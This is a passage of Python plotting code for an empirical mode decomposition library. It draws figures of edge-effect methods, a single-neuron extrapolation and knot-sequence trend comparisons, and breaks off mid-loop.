min_bool = utils.min_bool_func_1st_order_fd()
minima_x = time[min_bool]
minima_y = time_series[min_bool]
max_dash_time = np.linspace(maxima_x[-1] - width, maxima_x[-1] + width, 101)
max_dash = maxima_y[-1] * np.ones_like(max_dash_time)
min_dash_time = np.linspace(minima_x[-1] - width, minima_x[-1] + width, 101)
min_dash = minima_y[-1] * np.ones_like(min_dash_time)
dash_1_time = np.linspace(maxima_x[-1], minima_x[-1], 101)
dash_1 = np.linspace(maxima_y[-1], minima_y[-1], 101)
max_discard = maxima_y[-1]
max_discard_time = minima_x[-1] - maxima_x[-1] + minima_x[-1]
max_discard_dash_time = np.linspace(max_discard_time - width, max_discard_time + width, 101)
max_discard_dash = max_discard * np.ones_like(max_discard_dash_time)
dash_2_time = np.linspace(minima_x[-1], max_discard_time, 101)
dash_2 = np.linspace(minima_y[-1], max_discard, 101)
end_point_time = time[-1]
end_point = time_series[-1]
time_reflect = np.linspace((5 - a) * np.pi, (5 + a) * np.pi, 101)
time_series_reflect = np.flip(np.cos(np.linspace((5 - 2.6 * a) * np.pi,
(5 - a) * np.pi, 101)) + np.cos(5 * np.linspace((5 - 2.6 * a) * np.pi,
(5 - a) * np.pi, 101)))
time_series_anti_reflect = time_series_reflect[0] - time_series_reflect
utils = emd_utils.Utility(time=time, time_series=time_series_anti_reflect)
anti_max_bool = utils.max_bool_func_1st_order_fd()
anti_max_point_time = time_reflect[anti_max_bool]
anti_max_point = time_series_anti_reflect[anti_max_bool]
utils = emd_utils.Utility(time=time, time_series=time_series_reflect)
no_anchor_max_time = time_reflect[utils.max_bool_func_1st_order_fd()]
no_anchor_max = time_series_reflect[utils.max_bool_func_1st_order_fd()]
point_1 = 5.4
length_distance = np.linspace(maxima_y[-1], minima_y[-1], 101)
length_distance_time = point_1 * np.pi * np.ones_like(length_distance)
length_time = np.linspace(point_1 * np.pi - width, point_1 * np.pi + width, 101)
length_top = maxima_y[-1] * np.ones_like(length_time)
length_bottom = minima_y[-1] * np.ones_like(length_time)
point_2 = 5.2
length_distance_2 = np.linspace(time_series[-1], minima_y[-1], 101)
length_distance_time_2 = point_2 * np.pi * np.ones_like(length_distance_2)
length_time_2 = np.linspace(point_2 * np.pi - width, point_2 * np.pi + width, 101)
length_top_2 = time_series[-1] * np.ones_like(length_time_2)
length_bottom_2 = minima_y[-1] * np.ones_like(length_time_2)
symmetry_axis_1_time = minima_x[-1] * np.ones(101)
symmetry_axis_2_time = time[-1] * np.ones(101)
symmetry_axis = np.linspace(-2, 2, 101)
end_time = np.linspace(time[-1] - width, time[-1] + width, 101)
end_signal = time_series[-1] * np.ones_like(end_time)
anti_symmetric_time = np.linspace(time[-1] - 0.5, time[-1] + 0.5, 101)
anti_symmetric_signal = time_series[-1] * np.ones_like(anti_symmetric_time)
ax = plt.subplot(111)
plt.gcf().subplots_adjust(bottom=0.10)
plt.plot(time, time_series, LineWidth=2, label='Signal')
plt.title('Symmetry Edge Effects Example')
plt.plot(time_reflect, time_series_reflect, 'g--', LineWidth=2, label=textwrap.fill('Symmetric signal', 10))
plt.plot(time_reflect[:51], time_series_anti_reflect[:51], '--', c='purple', LineWidth=2,
label=textwrap.fill('Anti-symmetric signal', 10))
plt.plot(max_dash_time, max_dash, 'k-')
plt.plot(min_dash_time, min_dash, 'k-')
plt.plot(dash_1_time, dash_1, 'k--')
plt.plot(dash_2_time, dash_2, 'k--')
plt.plot(length_distance_time, length_distance, 'k--')
plt.plot(length_distance_time_2, length_distance_2, 'k--')
plt.plot(length_time, length_top, 'k-')
plt.plot(length_time, length_bottom, 'k-')
plt.plot(length_time_2, length_top_2, 'k-')
plt.plot(length_time_2, length_bottom_2, 'k-')
plt.plot(end_time, end_signal, 'k-')
plt.plot(symmetry_axis_1_time, symmetry_axis, 'r--', zorder=1)
plt.plot(anti_symmetric_time, anti_symmetric_signal, 'r--', zorder=1)
plt.plot(symmetry_axis_2_time, symmetry_axis, 'r--', label=textwrap.fill('Axes of symmetry', 10), zorder=1)
plt.text(5.1 * np.pi, -0.7, r'$\beta$L')
plt.text(5.34 * np.pi, -0.05, 'L')
plt.scatter(maxima_x, maxima_y, c='r', zorder=4, label='Maxima')
plt.scatter(minima_x, minima_y, c='b', zorder=4, label='Minima')
plt.scatter(max_discard_time, max_discard, c='purple', zorder=4, label=textwrap.fill('Symmetric Discard maxima', 10))
plt.scatter(end_point_time, end_point, c='orange', zorder=4, label=textwrap.fill('Symmetric Anchor maxima', 10))
plt.scatter(anti_max_point_time, anti_max_point, c='green', zorder=4, label=textwrap.fill('Anti-Symmetric maxima', 10))
plt.scatter(no_anchor_max_time, no_anchor_max, c='gray', zorder=4, label=textwrap.fill('Symmetric maxima', 10))
plt.xlim(3.9 * np.pi, 5.5 * np.pi)
plt.xticks((4 * np.pi, 5 * np.pi), (r'4$\pi$', r'5$\pi$'))
plt.yticks((-2, -1, 0, 1, 2), ('-2', '-1', '0', '1', '2'))
box_0 = ax.get_position()
ax.set_position([box_0.x0 - 0.05, box_0.y0, box_0.width * 0.85, box_0.height])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/edge_effects_symmetry_anti.png')
plt.show()
# plot 4
a = 0.21
width = 0.2
time = np.linspace(0, (5 - a) * np.pi, 1001)
time_series = np.cos(time) + np.cos(5 * time)
utils = emd_utils.Utility(time=time, time_series=time_series)
max_bool = utils.max_bool_func_1st_order_fd()
maxima_x = time[max_bool]
maxima_y = time_series[max_bool]
min_bool = utils.min_bool_func_1st_order_fd()
minima_x = time[min_bool]
minima_y = time_series[min_bool]
max_dash_1 = np.linspace(maxima_y[-1] - width, maxima_y[-1] + width, 101)
max_dash_2 = np.linspace(maxima_y[-2] - width, maxima_y[-2] + width, 101)
max_dash_time_1 = maxima_x[-1] * np.ones_like(max_dash_1)
max_dash_time_2 = maxima_x[-2] * np.ones_like(max_dash_1)
min_dash_1 = np.linspace(minima_y[-1] - width, minima_y[-1] + width, 101)
min_dash_2 = np.linspace(minima_y[-2] - width, minima_y[-2] + width, 101)
min_dash_time_1 = minima_x[-1] * np.ones_like(min_dash_1)
min_dash_time_2 = minima_x[-2] * np.ones_like(min_dash_1)
dash_1_time = np.linspace(maxima_x[-1], minima_x[-1], 101)
dash_1 = np.linspace(maxima_y[-1], minima_y[-1], 101)
dash_2_time = np.linspace(maxima_x[-1], minima_x[-2], 101)
dash_2 = np.linspace(maxima_y[-1], minima_y[-2], 101)
s1 = (minima_y[-2] - maxima_y[-1]) / (minima_x[-2] - maxima_x[-1])
slope_based_maximum_time = maxima_x[-1] + (maxima_x[-1] - maxima_x[-2])
slope_based_maximum = minima_y[-1] + (slope_based_maximum_time - minima_x[-1]) * s1
max_dash_time_3 = slope_based_maximum_time * np.ones_like(max_dash_1)
max_dash_3 = np.linspace(slope_based_maximum - width, slope_based_maximum + width, 101)
dash_3_time = np.linspace(minima_x[-1], slope_based_maximum_time, 101)
dash_3 = np.linspace(minima_y[-1], slope_based_maximum, 101)
s2 = (minima_y[-1] - maxima_y[-1]) / (minima_x[-1] - maxima_x[-1])
slope_based_minimum_time = minima_x[-1] + (minima_x[-1] - minima_x[-2])
slope_based_minimum = slope_based_maximum - (slope_based_maximum_time - slope_based_minimum_time) * s2
min_dash_time_3 = slope_based_minimum_time * np.ones_like(min_dash_1)
min_dash_3 = np.linspace(slope_based_minimum - width, slope_based_minimum + width, 101)
dash_4_time = np.linspace(slope_based_maximum_time, slope_based_minimum_time)
dash_4 = np.linspace(slope_based_maximum, slope_based_minimum)
maxima_dash = np.linspace(2.5 - width, 2.5 + width, 101)
maxima_dash_time_1 = maxima_x[-2] * np.ones_like(maxima_dash)
maxima_dash_time_2 = maxima_x[-1] * np.ones_like(maxima_dash)
maxima_dash_time_3 = slope_based_maximum_time * np.ones_like(maxima_dash)
maxima_line_dash_time = np.linspace(maxima_x[-2], slope_based_maximum_time, 101)
maxima_line_dash = 2.5 * np.ones_like(maxima_line_dash_time)
minima_dash = np.linspace(-3.4 - width, -3.4 + width, 101)
minima_dash_time_1 = minima_x[-2] * np.ones_like(minima_dash)
minima_dash_time_2 = minima_x[-1] * np.ones_like(minima_dash)
minima_dash_time_3 = slope_based_minimum_time * np.ones_like(minima_dash)
minima_line_dash_time = np.linspace(minima_x[-2], slope_based_minimum_time, 101)
minima_line_dash = -3.4 * np.ones_like(minima_line_dash_time)
# slightly edit signal to make difference between slope-based method and improved slope-based method more clear
time_series[time >= minima_x[-1]] = 1.5 * (time_series[time >= minima_x[-1]] - time_series[time == minima_x[-1]]) + \
time_series[time == minima_x[-1]]
improved_slope_based_maximum_time = time[-1]
improved_slope_based_maximum = time_series[-1]
improved_slope_based_minimum_time = slope_based_minimum_time
improved_slope_based_minimum = improved_slope_based_maximum + s2 * (improved_slope_based_minimum_time -
improved_slope_based_maximum_time)
min_dash_4 = np.linspace(improved_slope_based_minimum - width, improved_slope_based_minimum + width, 101)
min_dash_time_4 = improved_slope_based_minimum_time * np.ones_like(min_dash_4)
dash_final_time = np.linspace(improved_slope_based_maximum_time, improved_slope_based_minimum_time, 101)
dash_final = np.linspace(improved_slope_based_maximum, improved_slope_based_minimum, 101)
ax = plt.subplot(111)
figure_size = plt.gcf().get_size_inches()
factor = 0.9
plt.gcf().set_size_inches((figure_size[0], factor * figure_size[1]))
plt.gcf().subplots_adjust(bottom=0.10)
plt.plot(time, time_series, LineWidth=2, label='Signal')
plt.title('Slope-Based Edge Effects Example')
plt.plot(max_dash_time_1, max_dash_1, 'k-')
plt.plot(max_dash_time_2, max_dash_2, 'k-')
plt.plot(max_dash_time_3, max_dash_3, 'k-')
plt.plot(min_dash_time_1, min_dash_1, 'k-')
plt.plot(min_dash_time_2, min_dash_2, 'k-')
plt.plot(min_dash_time_3, min_dash_3, 'k-')
plt.plot(min_dash_time_4, min_dash_4, 'k-')
plt.plot(maxima_dash_time_1, maxima_dash, 'k-')
plt.plot(maxima_dash_time_2, maxima_dash, 'k-')
plt.plot(maxima_dash_time_3, maxima_dash, 'k-')
plt.plot(minima_dash_time_1, minima_dash, 'k-')
plt.plot(minima_dash_time_2, minima_dash, 'k-')
plt.plot(minima_dash_time_3, minima_dash, 'k-')
plt.text(4.34 * np.pi, -3.2, r'$\Delta{t^{min}_{m}}$')
plt.text(4.74 * np.pi, -3.2, r'$\Delta{t^{min}_{m}}$')
plt.text(4.12 * np.pi, 2, r'$\Delta{t^{max}_{M}}$')
plt.text(4.50 * np.pi, 2, r'$\Delta{t^{max}_{M}}$')
plt.text(4.30 * np.pi, 0.35, r'$s_1$')
plt.text(4.43 * np.pi, -0.20, r'$s_2$')
plt.text(4.30 * np.pi + (minima_x[-1] - minima_x[-2]), 0.35 + (minima_y[-1] - minima_y[-2]), r'$s_1$')
plt.text(4.43 * np.pi + (slope_based_minimum_time - minima_x[-1]),
-0.20 + (slope_based_minimum - minima_y[-1]), r'$s_2$')
plt.text(4.50 * np.pi + (slope_based_minimum_time - minima_x[-1]),
1.20 + (slope_based_minimum - minima_y[-1]), r'$s_2$')
plt.plot(minima_line_dash_time, minima_line_dash, 'k--')
plt.plot(maxima_line_dash_time, maxima_line_dash, 'k--')
plt.plot(dash_1_time, dash_1, 'k--')
plt.plot(dash_2_time, dash_2, 'k--')
plt.plot(dash_3_time, dash_3, 'k--')
plt.plot(dash_4_time, dash_4, 'k--')
plt.plot(dash_final_time, dash_final, 'k--')
plt.scatter(maxima_x, maxima_y, c='r', zorder=4, label='Maxima')
plt.scatter(minima_x, minima_y, c='b', zorder=4, label='Minima')
plt.scatter(slope_based_maximum_time, slope_based_maximum, c='orange', zorder=4,
label=textwrap.fill('Slope-based maximum', 11))
plt.scatter(slope_based_minimum_time, slope_based_minimum, c='purple', zorder=4,
label=textwrap.fill('Slope-based minimum', 11))
plt.scatter(improved_slope_based_maximum_time, improved_slope_based_maximum, c='deeppink', zorder=4,
label=textwrap.fill('Improved slope-based maximum', 11))
plt.scatter(improved_slope_based_minimum_time, improved_slope_based_minimum, c='dodgerblue', zorder=4,
label=textwrap.fill('Improved slope-based minimum', 11))
plt.xlim(3.9 * np.pi, 5.5 * np.pi)
plt.xticks((4 * np.pi, 5 * np.pi), (r'4$\pi$', r'5$\pi$'))
plt.yticks((-3, -2, -1, 0, 1, 2), ('-3', '-2', '-1', '0', '1', '2'))
box_0 = ax.get_position()
ax.set_position([box_0.x0 - 0.05, box_0.y0, box_0.width * 0.85, box_0.height])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/edge_effects_slope_based.png')
plt.show()
# plot 5
a = 0.25
width = 0.2
time = np.linspace(0, (5 - a) * np.pi, 1001)
time_series = np.cos(time) + np.cos(5 * time)
utils = emd_utils.Utility(time=time, time_series=time_series)
max_bool = utils.max_bool_func_1st_order_fd()
maxima_x = time[max_bool]
maxima_y = time_series[max_bool]
min_bool = utils.min_bool_func_1st_order_fd()
minima_x = time[min_bool]
minima_y = time_series[min_bool]
A2 = np.abs(maxima_y[-2] - minima_y[-2]) / 2
A1 = np.abs(maxima_y[-1] - minima_y[-1]) / 2
P2 = 2 * np.abs(maxima_x[-2] - minima_x[-2])
P1 = 2 * np.abs(maxima_x[-1] - minima_x[-1])
Huang_time = (P1 / P2) * (time[time >= maxima_x[-2]] - time[time == maxima_x[-2]]) + maxima_x[-1]
Huang_wave = (A1 / A2) * (time_series[time >= maxima_x[-2]] - time_series[time == maxima_x[-2]]) + maxima_y[-1]
Coughlin_time = Huang_time
Coughlin_wave = A1 * np.cos(2 * np.pi * (1 / P1) * (Coughlin_time - Coughlin_time[0]))
Average_max_time = maxima_x[-1] + (maxima_x[-1] - maxima_x[-2])
Average_max = (maxima_y[-2] + maxima_y[-1]) / 2
Average_min_time = minima_x[-1] + (minima_x[-1] - minima_x[-2])
Average_min = (minima_y[-2] + minima_y[-1]) / 2
utils_Huang = emd_utils.Utility(time=time, time_series=Huang_wave)
Huang_max_bool = utils_Huang.max_bool_func_1st_order_fd()
Huang_min_bool = utils_Huang.min_bool_func_1st_order_fd()
utils_Coughlin = emd_utils.Utility(time=time, time_series=Coughlin_wave)
Coughlin_max_bool = utils_Coughlin.max_bool_func_1st_order_fd()
Coughlin_min_bool = utils_Coughlin.min_bool_func_1st_order_fd()
Huang_max_time = Huang_time[Huang_max_bool]
Huang_max = Huang_wave[Huang_max_bool]
Huang_min_time = Huang_time[Huang_min_bool]
Huang_min = Huang_wave[Huang_min_bool]
Coughlin_max_time = Coughlin_time[Coughlin_max_bool]
Coughlin_max = Coughlin_wave[Coughlin_max_bool]
Coughlin_min_time = Coughlin_time[Coughlin_min_bool]
Coughlin_min = Coughlin_wave[Coughlin_min_bool]
max_2_x_time = np.linspace(maxima_x[-2] - width, maxima_x[-2] + width, 101)
max_2_x_time_side = np.linspace(5.3 * np.pi - width, 5.3 * np.pi + width, 101)
max_2_x = maxima_y[-2] * np.ones_like(max_2_x_time)
min_2_x_time = np.linspace(minima_x[-2] - width, minima_x[-2] + width, 101)
min_2_x_time_side = np.linspace(5.3 * np.pi - width, 5.3 * np.pi + width, 101)
min_2_x = minima_y[-2] * np.ones_like(min_2_x_time)
dash_max_min_2_x = np.linspace(minima_y[-2], maxima_y[-2], 101)
dash_max_min_2_x_time = 5.3 * np.pi * np.ones_like(dash_max_min_2_x)
max_2_y = np.linspace(maxima_y[-2] - width, maxima_y[-2] + width, 101)
max_2_y_side = np.linspace(-1.8 - width, -1.8 + width, 101)
max_2_y_time = maxima_x[-2] * np.ones_like(max_2_y)
min_2_y = np.linspace(minima_y[-2] - width, minima_y[-2] + width, 101)
min_2_y_side = np.linspace(-1.8 - width, -1.8 + width, 101)
min_2_y_time = minima_x[-2] * np.ones_like(min_2_y)
dash_max_min_2_y_time = np.linspace(minima_x[-2], maxima_x[-2], 101)
dash_max_min_2_y = -1.8 * np.ones_like(dash_max_min_2_y_time)
max_1_x_time = np.linspace(maxima_x[-1] - width, maxima_x[-1] + width, 101)
max_1_x_time_side = np.linspace(5.4 * np.pi - width, 5.4 * np.pi + width, 101)
max_1_x = maxima_y[-1] * np.ones_like(max_1_x_time)
min_1_x_time = np.linspace(minima_x[-1] - width, minima_x[-1] + width, 101)
min_1_x_time_side = np.linspace(5.4 * np.pi - width, 5.4 * np.pi + width, 101)
min_1_x = minima_y[-1] * np.ones_like(min_1_x_time)
dash_max_min_1_x = np.linspace(minima_y[-1], maxima_y[-1], 101)
dash_max_min_1_x_time = 5.4 * np.pi * np.ones_like(dash_max_min_1_x)
max_1_y = np.linspace(maxima_y[-1] - width, maxima_y[-1] + width, 101)
max_1_y_side = np.linspace(-2.1 - width, -2.1 + width, 101)
max_1_y_time = maxima_x[-1] * np.ones_like(max_1_y)
min_1_y = np.linspace(minima_y[-1] - width, minima_y[-1] + width, 101)
min_1_y_side = np.linspace(-2.1 - width, -2.1 + width, 101)
min_1_y_time = minima_x[-1] * np.ones_like(min_1_y)
dash_max_min_1_y_time = np.linspace(minima_x[-1], maxima_x[-1], 101)
dash_max_min_1_y = -2.1 * np.ones_like(dash_max_min_1_y_time)
ax = plt.subplot(111)
plt.gcf().subplots_adjust(bottom=0.10)
plt.title('Characteristic Wave Effects Example')
plt.plot(time, time_series, LineWidth=2, label='Signal')
plt.scatter(Huang_max_time, Huang_max, c='magenta', zorder=4, label=textwrap.fill('Huang maximum', 10))
plt.scatter(Huang_min_time, Huang_min, c='lime', zorder=4, label=textwrap.fill('Huang minimum', 10))
plt.scatter(Coughlin_max_time, Coughlin_max, c='darkorange', zorder=4,
label=textwrap.fill('Coughlin maximum', 14))
plt.scatter(Coughlin_min_time, Coughlin_min, c='dodgerblue', zorder=4,
label=textwrap.fill('Coughlin minimum', 14))
plt.scatter(Average_max_time, Average_max, c='orangered', zorder=4,
label=textwrap.fill('Average maximum', 14))
plt.scatter(Average_min_time, Average_min, c='cyan', zorder=4,
label=textwrap.fill('Average minimum', 14))
plt.scatter(maxima_x, maxima_y, c='r', zorder=4, label='Maxima')
plt.scatter(minima_x, minima_y, c='b', zorder=4, label='Minima')
plt.plot(Huang_time, Huang_wave, '--', c='darkviolet', label=textwrap.fill('Huang Characteristic Wave', 14))
plt.plot(Coughlin_time, Coughlin_wave, '--', c='darkgreen', label=textwrap.fill('Coughlin Characteristic Wave', 14))
plt.plot(max_2_x_time, max_2_x, 'k-')
plt.plot(max_2_x_time_side, max_2_x, 'k-')
plt.plot(min_2_x_time, min_2_x, 'k-')
plt.plot(min_2_x_time_side, min_2_x, 'k-')
plt.plot(dash_max_min_2_x_time, dash_max_min_2_x, 'k--')
plt.text(5.16 * np.pi, 0.85, r'$2a_2$')
plt.plot(max_2_y_time, max_2_y, 'k-')
plt.plot(max_2_y_time, max_2_y_side, 'k-')
plt.plot(min_2_y_time, min_2_y, 'k-')
plt.plot(min_2_y_time, min_2_y_side, 'k-')
plt.plot(dash_max_min_2_y_time, dash_max_min_2_y, 'k--')
plt.text(4.08 * np.pi, -2.2, r'$\frac{p_2}{2}$')
plt.plot(max_1_x_time, max_1_x, 'k-')
plt.plot(max_1_x_time_side, max_1_x, 'k-')
plt.plot(min_1_x_time, min_1_x, 'k-')
plt.plot(min_1_x_time_side, min_1_x, 'k-')
plt.plot(dash_max_min_1_x_time, dash_max_min_1_x, 'k--')
plt.text(5.42 * np.pi, -0.1, r'$2a_1$')
plt.plot(max_1_y_time, max_1_y, 'k-')
plt.plot(max_1_y_time, max_1_y_side, 'k-')
plt.plot(min_1_y_time, min_1_y, 'k-')
plt.plot(min_1_y_time, min_1_y_side, 'k-')
plt.plot(dash_max_min_1_y_time, dash_max_min_1_y, 'k--')
plt.text(4.48 * np.pi, -2.5, r'$\frac{p_1}{2}$')
plt.xlim(3.9 * np.pi, 5.6 * np.pi)
plt.xticks((4 * np.pi, 5 * np.pi), (r'4$\pi$', r'5$\pi$'))
plt.yticks((-2, -1, 0, 1, 2), ('-2', '-1', '0', '1', '2'))
box_0 = ax.get_position()
ax.set_position([box_0.x0 - 0.05, box_0.y0, box_0.width * 0.84, box_0.height])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/edge_effects_characteristic_wave.png')
plt.show()
# plot 6
t = np.linspace(5, 95, 100)
signal_orig = np.cos(2 * np.pi * t / 50) + 0.6 * np.cos(2 * np.pi * t / 25) + 0.5 * np.sin(2 * np.pi * t / 200)
util_nn = emd_utils.Utility(time=t, time_series=signal_orig)
maxima = signal_orig[util_nn.max_bool_func_1st_order_fd()]
minima = signal_orig[util_nn.min_bool_func_1st_order_fd()]
cs_max = CubicSpline(t[util_nn.max_bool_func_1st_order_fd()], maxima)
cs_min = CubicSpline(t[util_nn.min_bool_func_1st_order_fd()], minima)
time = np.linspace(0, 5 * np.pi, 1001)
lsq_signal = np.cos(time) + np.cos(5 * time)
knots = np.linspace(0, 5 * np.pi, 101)
time_extended = time_extension(time)
time_series_extended = np.zeros_like(time_extended) / 0
time_series_extended[int(len(lsq_signal) - 1):int(2 * (len(lsq_signal) - 1) + 1)] = lsq_signal
neural_network_m = 200
neural_network_k = 100
# forward ->
P = np.zeros((int(neural_network_k + 1), neural_network_m))
for col in range(neural_network_m):
P[:-1, col] = lsq_signal[(-(neural_network_m + neural_network_k - col)):(-(neural_network_m - col))]
P[-1, col] = 1 # for additive constant
t = lsq_signal[-neural_network_m:]
# test - top
seed_weights = np.ones(neural_network_k) / neural_network_k
weights = 0 * seed_weights.copy()
train_input = P[:-1, :]
lr = 0.01
for iterations in range(1000):
output = np.matmul(weights, train_input)
error = (t - output)
gradients = error * (- train_input)
# guess average gradients
average_gradients = np.mean(gradients, axis=1)
# steepest descent
max_gradient_vector = average_gradients * (np.abs(average_gradients) == max(np.abs(average_gradients)))
adjustment = - lr * average_gradients
# adjustment = - lr * max_gradient_vector
weights += adjustment
# test - bottom
weights_right = np.hstack((weights, 0))
max_count_right = 0
min_count_right = 0
i_right = 0
while ((max_count_right < 1) or (min_count_right < 1)) and (i_right < len(lsq_signal) - 1):
time_series_extended[int(2 * (len(lsq_signal) - 1) + 1 + i_right)] = \
sum(weights_right * np.hstack((time_series_extended[
int(2 * (len(lsq_signal) - 1) + 1 - neural_network_k + i_right):
int(2 * (len(lsq_signal) - 1) + 1 + i_right)], 1)))
i_right += 1
if i_right > 1:
emd_utils_max = \
emd_utils.Utility(time=time_extended[int(2 * (len(lsq_signal) - 1) + 1):
int(2 * (len(lsq_signal) - 1) + 1 + i_right + 1)],
time_series=time_series_extended[int(2 * (len(lsq_signal) - 1) + 1):
int(2 * (len(lsq_signal) - 1) + 1 + i_right + 1)])
if sum(emd_utils_max.max_bool_func_1st_order_fd()) > 0:
max_count_right += 1
emd_utils_min = \
emd_utils.Utility(time=time_extended[int(2 * (len(lsq_signal) - 1) + 1):
int(2 * (len(lsq_signal) - 1) + 1 + i_right + 1)],
time_series=time_series_extended[int(2 * (len(lsq_signal) - 1) + 1):
int(2 * (len(lsq_signal) - 1) + 1 + i_right + 1)])
if sum(emd_utils_min.min_bool_func_1st_order_fd()) > 0:
min_count_right += 1
# backward <-
P = np.zeros((int(neural_network_k + 1), neural_network_m))
for col in range(neural_network_m):
P[:-1, col] = lsq_signal[int(col + 1):int(col + neural_network_k + 1)]
P[-1, col] = 1 # for additive constant
t = lsq_signal[:neural_network_m]
vx = cvx.Variable(int(neural_network_k + 1))
objective = cvx.Minimize(cvx.norm((2 * (vx * P) + 1 - t), 2)) # linear activation function is arbitrary
prob = cvx.Problem(objective)
result = prob.solve(verbose=True, solver=cvx.ECOS)
weights_left = np.array(vx.value)
max_count_left = 0
min_count_left = 0
i_left = 0
while ((max_count_left < 1) or (min_count_left < 1)) and (i_left < len(lsq_signal) - 1):
time_series_extended[int(len(lsq_signal) - 2 - i_left)] = \
2 * sum(weights_left * np.hstack((time_series_extended[int(len(lsq_signal) - 1 - i_left):
int(len(lsq_signal) - 1 - i_left + neural_network_k)],
1))) + 1
i_left += 1
if i_left > 1:
emd_utils_max = \
emd_utils.Utility(time=time_extended[int(len(lsq_signal) - 1 - i_left):int(len(lsq_signal))],
time_series=time_series_extended[int(len(lsq_signal) - 1 - i_left):int(len(lsq_signal))])
if sum(emd_utils_max.max_bool_func_1st_order_fd()) > 0:
max_count_left += 1
emd_utils_min = \
emd_utils.Utility(time=time_extended[int(len(lsq_signal) - 1 - i_left):int(len(lsq_signal))],
time_series=time_series_extended[int(len(lsq_signal) - 1 - i_left):int(len(lsq_signal))])
if sum(emd_utils_min.min_bool_func_1st_order_fd()) > 0:
min_count_left += 1
lsq_utils = emd_utils.Utility(time=time, time_series=lsq_signal)
utils_extended = emd_utils.Utility(time=time_extended, time_series=time_series_extended)
maxima = lsq_signal[lsq_utils.max_bool_func_1st_order_fd()]
maxima_time = time[lsq_utils.max_bool_func_1st_order_fd()]
maxima_extrapolate = time_series_extended[utils_extended.max_bool_func_1st_order_fd()][-1]
maxima_extrapolate_time = time_extended[utils_extended.max_bool_func_1st_order_fd()][-1]
minima = lsq_signal[lsq_utils.min_bool_func_1st_order_fd()]
minima_time = time[lsq_utils.min_bool_func_1st_order_fd()]
minima_extrapolate = time_series_extended[utils_extended.min_bool_func_1st_order_fd()][-2:]
minima_extrapolate_time = time_extended[utils_extended.min_bool_func_1st_order_fd()][-2:]
ax = plt.subplot(111)
plt.gcf().subplots_adjust(bottom=0.10)
plt.title('Single Neuron Neural Network Example')
plt.plot(time, lsq_signal, zorder=2, label='Signal')
plt.plot(time_extended, time_series_extended, c='g', zorder=1, label=textwrap.fill('Extrapolated signal', 12))
plt.scatter(maxima_time, maxima, c='r', zorder=3, label='Maxima')
plt.scatter(minima_time, minima, c='b', zorder=3, label='Minima')
plt.scatter(maxima_extrapolate_time, maxima_extrapolate, c='magenta', zorder=3,
label=textwrap.fill('Extrapolated maxima', 12))
plt.scatter(minima_extrapolate_time, minima_extrapolate, c='cyan', zorder=4,
label=textwrap.fill('Extrapolated minima', 12))
plt.plot(((time[-302] + time[-301]) / 2) * np.ones(100), np.linspace(-2.75, 2.75, 100), c='k',
label=textwrap.fill('Neural network inputs', 13))
plt.plot(np.linspace(((time[-302] + time[-301]) / 2), ((time[-302] + time[-301]) / 2) + 0.1, 100),
-2.75 * np.ones(100), c='k')
plt.plot(np.linspace(((time[-302] + time[-301]) / 2), ((time[-302] + time[-301]) / 2) + 0.1, 100),
2.75 * np.ones(100), c='k')
plt.plot(np.linspace(((time_extended[-1001] + time_extended[-1002]) / 2),
((time_extended[-1001] + time_extended[-1002]) / 2) - 0.1, 100), -2.75 * np.ones(100), c='k')
plt.plot(np.linspace(((time_extended[-1001] + time_extended[-1002]) / 2),
((time_extended[-1001] + time_extended[-1002]) / 2) - 0.1, 100), 2.75 * np.ones(100), c='k')
plt.plot(((time_extended[-1001] + time_extended[-1002]) / 2) * np.ones(100), np.linspace(-2.75, 2.75, 100), c='k')
plt.plot(((time[-202] + time[-201]) / 2) * np.ones(100), np.linspace(-2.75, 2.75, 100), c='gray', linestyle='dashed',
label=textwrap.fill('Neural network targets', 13))
plt.plot(np.linspace(((time[-202] + time[-201]) / 2), ((time[-202] + time[-201]) / 2) + 0.1, 100),
-2.75 * np.ones(100), c='gray')
plt.plot(np.linspace(((time[-202] + time[-201]) / 2), ((time[-202] + time[-201]) / 2) + 0.1, 100),
2.75 * np.ones(100), c='gray')
plt.plot(np.linspace(((time_extended[-1001] + time_extended[-1000]) / 2),
((time_extended[-1001] + time_extended[-1000]) / 2) - 0.1, 100), -2.75 * np.ones(100), c='gray')
plt.plot(np.linspace(((time_extended[-1001] + time_extended[-1000]) / 2),
((time_extended[-1001] + time_extended[-1000]) / 2) - 0.1, 100), 2.75 * np.ones(100), c='gray')
plt.plot(((time_extended[-1001] + time_extended[-1000]) / 2) * np.ones(100), np.linspace(-2.75, 2.75, 100), c='gray',
linestyle='dashed')
plt.xlim(3.4 * np.pi, 5.6 * np.pi)
plt.xticks((4 * np.pi, 5 * np.pi), (r'4$\pi$', r'5$\pi$'))
plt.yticks((-2, -1, 0, 1, 2), ('-2', '-1', '0', '1', '2'))
box_0 = ax.get_position()
ax.set_position([box_0.x0 - 0.05, box_0.y0, box_0.width * 0.84, box_0.height])
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
plt.savefig('jss_figures/neural_network.png')
plt.show()
# plot 6a
np.random.seed(0)
time = np.linspace(0, 5 * np.pi, 1001)
knots_51 = np.linspace(0, 5 * np.pi, 51)
time_series = np.cos(2 * time) + np.cos(4 * time) + np.cos(8 * time)
noise = np.random.normal(0, 1, len(time_series))
time_series += noise
advemdpy = EMD(time=time, time_series=time_series)
imfs_51, hts_51, ifs_51 = advemdpy.empirical_mode_decomposition(knots=knots_51, max_imfs=3,
edge_effect='symmetric_anchor', verbose=False)[:3]
knots_31 = np.linspace(0, 5 * np.pi, 31)
imfs_31, hts_31, ifs_31 = advemdpy.empirical_mode_decomposition(knots=knots_31, max_imfs=2,
edge_effect='symmetric_anchor', verbose=False)[:3]
knots_11 = np.linspace(0, 5 * np.pi, 11)
imfs_11, hts_11, ifs_11 = advemdpy.empirical_mode_decomposition(knots=knots_11, max_imfs=1,
edge_effect='symmetric_anchor', verbose=False)[:3]
fig, axs = plt.subplots(3, 1)
plt.suptitle(textwrap.fill('Comparison of Trends Extracted with Different Knot Sequences', 40))
plt.subplots_adjust(hspace=0.1)
axs[0].plot(time, time_series, label='Time series')
axs[0].plot(time, imfs_51[1, :] + imfs_51[2, :] + imfs_51[3, :], label=textwrap.fill('Sum of IMF 1, IMF 2, & IMF 3 with 51 knots', 21))
print(f'DFA fluctuation with 51 knots: {np.round(np.var(time_series - (imfs_51[1, :] + imfs_51[2, :] + imfs_51[3, :])), 3)}')
for knot in knots_51:
